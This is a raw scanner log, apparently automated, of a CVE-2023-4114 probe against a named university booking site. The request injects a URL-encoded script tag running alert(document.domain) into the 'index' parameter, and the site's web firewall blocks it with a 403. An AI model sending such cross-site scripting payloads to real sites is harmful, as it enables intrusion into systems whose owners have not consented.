[CVE-2023-4114] Dumped HTTP request for https://bookings.mdhs.unimelb.edu.au/index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date


GET /index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date HTTP/1.1
Host: bookings.mdhs.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2023-4114] Dumped HTTP response https://bookings.mdhs.unimelb.edu.au/index.php?controller=pjFront&action=pjActionSearch&session_id&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 828
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3209806=3177lCJ9SUeZdBK/ZxMHMftxk2gAAAAAQUIPAAAAAAC6jkF1iQItiMiuFlBbKk06; expires=Thu, 06 Aug 2026 07:06:46 GMT; HttpOnly; path=/; Domain=.mdhs.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3209806=0xlUDjXul1dQ1Larov5JA/txk2gAAAAATJCMVXR7e71ttpvvcnjuFQ==; path=/; Domain=.mdhs.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 0-684473-0 0NNN RT(1754493436250 15) q(0 -1 -1 -1) r(0 -1) B15(1,903758,0) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/A-Friends-My-nord-Say-Macb-Thout-affic-Dring-boy" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=0-684473-0%200NNN%20RT%281754493436250%2015%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U24&incident_id=237000430032578664-3700479413258944&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032578664-3700479413258944</iframe></body></html>
